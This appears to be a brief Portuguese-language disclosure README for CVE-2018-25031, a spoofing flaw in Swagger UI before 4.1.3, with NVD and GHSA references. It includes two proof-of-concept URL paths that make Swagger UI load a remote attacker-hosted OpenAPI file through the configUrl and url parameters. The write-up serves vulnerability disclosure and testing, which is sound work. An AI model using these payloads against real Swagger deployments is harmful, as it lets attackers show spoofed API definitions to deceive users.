CVE-2018-25031
Descrição:
O Swagger UI anterior à versão 4.1.3 poderia permitir que um atacante remoto realizasse ataques de spoofing. Ao persuadir uma vítima a abrir uma URL especialmente criada, um atacante poderia explorar esta vulnerabilidade para exibir definições OpenAPI remotas.
Captura de tela antes do ataque:
PoC:
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
Captura de tela do PoC após o ataque:
Referências:
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2
Testado no Swagger UI 3.52.1